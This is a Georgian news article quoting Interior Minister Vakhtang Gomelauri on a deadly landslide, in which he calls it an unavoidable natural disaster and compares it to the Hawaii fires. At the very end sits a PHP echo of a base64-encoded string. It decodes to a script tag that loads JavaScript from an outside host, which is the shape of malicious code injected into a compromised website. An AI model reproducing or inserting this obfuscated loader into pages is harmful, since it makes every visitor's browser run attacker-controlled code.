celsiusi
ავერსი საქკაბელი

ბუნებრივი შემთხვევა ყველგან შეიძლება მოხდეს, ვერ გავექცევით, სამწუხაროდ, მსოფლიოშია ასე, ჰავაიზე ასი ადამიანი დაიწვა და ასზე მეტი დაკარგულია. ამერიკა ჩვენზე ბევრად ძლიერი ქვეყანაა, ვერტმფრენებიც ჩვენზე მაგარი ჰყავთ, ავიაციაც ჰყავთ, მაგრამ მოხდა, ბუნებაა, რა ვქნათ, – ამის შესახებ საქართველოს შინაგან საქმეთა მინისტრმა, ვახტანგ გომელაურმა სტიქიის ზონაში ჟურნალისტებს განუცხადა.

„როგორც გვეუბნებიან, გარემოს კუთხით დღეს საფრთხე არ არის, თუმცა ეს არის ბუნებრივი შემთხვევა და ყველგან შეიძლება მოხდეს, არამარტო აქ. მინდა, ხაზი გავუსვა, რომ ჩვენ ვართ კავკასიონის ქედზე მცხოვრები ერი და ქვეყანა. რატომ არ იყო მოწყობილობები დაყენებული – წამების თემაა, რა მოწყობილობაც არ უნდა დავაყენოთ. მუშაობენ ახლა. ასე რომ მივყვეთ, ათასობით ოჯახებია, რომლებიც უნდა გავასახლოთ მაშინ, პირდაპირ გეუბნებით, დაწყებული ლაგოდეხიდან, ყვარლიდან, დამთავრებული აქამდე და კიდევ იქით ყაზბეგამდე ჩასული. ყველგან შეიძლება პრობლემა მოხდეს, წყალი ადიდდეს, ვერ გავექცევით, სამწუხაროდ. მსოფლიოშია ასე, რა მოხდა ჰავაიზე, ასი ადამიანი დაიწვა და ასზე მეტი დაკარგულია. ამერიკა ჩვენზე ბევრად ძლიერი ქვეყანაა, ვერტმფრენებიც ჩვენზე მაგარი ჰყავთ, ავიაციაც ჰყავთ, მაგრამ მოხდა. ხდება, ბუნებაა, რა ვქნათ, დიდი უბედურება მოხდა“, – განაცხადა ვახტანგ გომელაურმა.

კითხვაზე, „წინასწარ შეტყობინების სისტემა რომ ყოფილიყო დამონტაჟებული, ავიცილებდით ან მინიმუმამდე იქნებოდა თუ არა დაყვანილი ადამიანური ტრაგედია?“, – გომელაურმა უპასუხა, რომ ეს დამოკიდებულია იმაზე, რა სიჩქარით მოძრაობდა მეწყერი.

„მეწყერი თუ ჩამოვიდა დაახლოებით ერთ წუთში, ვერაფერს აიცილებდი, მაგრამ თუ, ვთქვათ, მოუნდა 10-12 წუთი, ეს ექსპერტებმა უნდა თქვან. მე ვერ გეტყვით, რამდენ წუთში ჩამოვიდა მეწყერი“, – აღნიშნა ვახტანგ გომელაურმა.

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");